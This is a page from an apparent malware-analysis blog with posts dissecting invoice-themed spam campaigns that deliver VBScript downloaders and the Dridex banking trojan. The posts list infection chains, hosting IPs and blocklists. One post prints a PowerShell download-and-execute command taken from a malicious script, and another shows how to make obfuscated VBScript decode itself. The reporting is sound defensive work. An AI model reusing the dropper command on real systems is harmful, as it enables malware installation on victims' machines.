Sponsored by..

Showing posts with label VBScript. Show all posts
Showing posts with label VBScript. Show all posts

Tuesday 12 May 2015

Malware spam: "ATTN: Outstanding Invoices - [4697E0] [April|May]"

This spam comes with random senders and reference numbers, but in all cases includes a malicious attachment:

From:    Debbie Barrett
Date:    12 May 2015 at 11:14
Subject:    ATTN: Outstanding Invoices - [4697E0] [April|May]

Dear anthony,

Kindly find attached our reminder and copy of the relevant invoices.
Looking forward to receive your prompt payment and thank you in advance.

Kind regards
The attachment name combines the recipient's email address with the fake reference number, e.g. barry_51DDAF.xls which isn't actually an Excel file at all, but a multipart MIME file. Payload Security's Hybrid Analysis tools manages to analyse it though, showing several steps in the infection chain.

First a VBScript is downloaded from pastebin[.]com/download.php?i=5K5YLjVu

Secondly, that VBScript then downloads a file from 92.63.88[.]87:8080/bt/get.php (MWTV, Latvia) which is saved as crypted.120.exe, this has a detection rate of 2/57.

This component then connects to (FastVPS, Estonia) and according to this Malwr report drops a Dridex DLL with a detection rate of 3/56.

There are several different attachments, so far I have seen the following MD5s:

The MD5s for the malware components are:

Recommended blocklist:

Wednesday 22 April 2015

Malware spam: "New document with ID:G27427P from RESTAURANT GROUP PLC was generated"

Made in Russia
I have only seen one sample of this spam so far, it is likely that other variants use different company names:

From:    Tamika Cortez
Date:    22 April 2015 at 14:33
Subject:    New document with ID:G27427P from RESTAURANT GROUP PLC was generated

New report with ID:G27427P was generated by our system. Please follow the link below to get your report.

Download report ID:G27427P

Best regards ,Tamika Cortez

In this case, the link in the email goes to:


..which includes the victim's email address in the URL. In turn, this redirects to:


As the name suggests, this is a VBScript (VT 1/56), in this case it is lightly obfuscated [pastebin] and it initiates a download from:

..which is saved as %TEMP%\jhvwrvcf.exe. The download location is (OVH, France). This file has a VirusTotal detection rate of 6/57. Automated analysis tools [1] [2] [3] show network connections to the following IPs: (Hetzner, Germany) (Camelhost SIA, Latvia) (Iliad Entreprises / Poney Telecom, France) (Invest Ltd, Ukraine)

According to this Malwr report, it drops a Dridex DLL with a detection rate of 3/57.

Recommended blocklist:


Wednesday 1 April 2015

Malware spam "Unpaid Invoice [09876] attached" / "This is your Remittance Advice [ID:12345]" with VBS-in-ZIP attachment

This rather terse spam has no body text and comes from random senders. It has a ZIP attachment which contains a malicious script.

Example subjects include:
Unpaid Invoice [09323] attached
Unpaid Invoice [86633] attached
Unpaid Invoice [35893] attached
This is your Remittance Advice [ID:42667]
This is your Remittance Advice [ID:69951]

Example senders:

Example attachment names:

Inside is a malicious VBS script. It is likely that there are several different versions, the one working sample I saw looked like this [pastebin] which is very similar to the VBA macro used in this spam run yesterday.

When run (I don't recommend this!) it executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\giuguiGIUGdsuf87t6F.cab'); expand %TEMP%\giuguiGIUGdsuf87t6F.cab %TEMP%\giuguiGIUGdsuf87t6F.exe; Start-Process %TEMP%\giuguiGIUGdsuf87t6F.exe;
Because there are probably several different versions of this script, there are probably several different download locations. In this case, a fake .GIF file is downloaded from a malware server at (Servachok Ltd, Russia) which is actually an .EXE file, but it gets saved as a .CAB file. For no very good reason it is passed through EXPAND which does nothing but save it to %TEMP%\giuguiGIUGdsuf87t6F.exe.

This binary has a detection rate of 4/55. Automated analysis tools [1] [2] [3] [4] show that the malware attempts to phone home to: (TheFirst-RU, Russia) (Tsukaeru.net, Japan) (DorukNet, Turkey) (MWTV, Latvia) (Digital Networks aka DINETHOSTING, Russia) (Synaptica, Canada) (Digital Ocean, Netherlands) (Synaptica, Canada) (iway AG GS, Switzerland) (Data Communication Business Group, Taiwan) (OVH / Simpace.com, UK) (Private Layer Inc, Switzerland)

It also drops another variant of the same downloader, edg1.exe with a detection rate of 3/56 and a Dridex DLL with a detection rate of 9/56.

Recommended blocklist:

Saturday 7 September 2013

Dealerbid.co.uk "Quotation.zip" spam with malicious VBS script

The website dealerbid.co.uk has been compromised and their servers hacked in order to send spam to their customer list. Something similar has happened before a few months ago.

In this case the spam email was somewhat mangled, but I am assuming that the spammers know how to fix this. The spam email is as follows:

From:     Christopher Rawson [christopher.r@kema.com]
Date:     7 September 2013 14:04
Subject:     Quotation


We have prepared a quotation, please see attached

With Kind Regards,
Christopher Rawson,
DNV KEMA Energy & Sustainability,

DNV KEMA is a real, legitimate company in the energy sector. But they did not send the spam, an examination of the headers shows that the sending IP is which is the same IP as www.dealerbid.co.uk and mail.dealerbid.co.uk. The email is sent to an address ONLY used to register at dealerbid.co.uk. So, the upshot is that this domain is compromised and it is compromised right now.

The email is meant to have an attachment called Quotation.zip but in my sample the email was mis-formatted and instead the Base 64 encoded ZIP file was in the main body text, starting thus:

Some copy-and-pasting and work with a Base 64 decoder ended up with a valid ZIP file, containing a somewhat obfuscated VBS script Quotation.vbs  with a low VirusTotal detection rate of 4/46.

I really don't know a lot about VBScript, but it's an interpreted language (like Javascript), so with some care you can get it do decode itself for you. The payload of the scripts was delivered by a line
execute (lqkxATqgKvblFIwSvnvFaUHynrslFbmIziWPjzin)
Changing "execute" to a a series of commands to write a file out.txt can get the script to decode itself and present the deobfuscated code for you.

Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write execute (lqkxATqgKvblFIwSvnvFaUHynrslFbmIziWPjzin) & vbCrLf
Obviously, great care should be taken to do this and a throwaway virtual machine is advised in case of errors.

I haven't had time to do much analysis of the malicious script, except that it attempts to download further components from klonkino.no-ip.org (port 1804) which is hosted on (Hosting Services Inc, UK). I strongly recommend blocking no-ip.org domains in any case, but I certainly recommend the following blocklist:

I haven't had time to analyse the second script further, but it has a VirusTotal detection rate of 21/47 which isn't too bad. If you want to have a look yourself, you can download the script from here (zip file, password = virus).. but obviously you need to know what you are doing!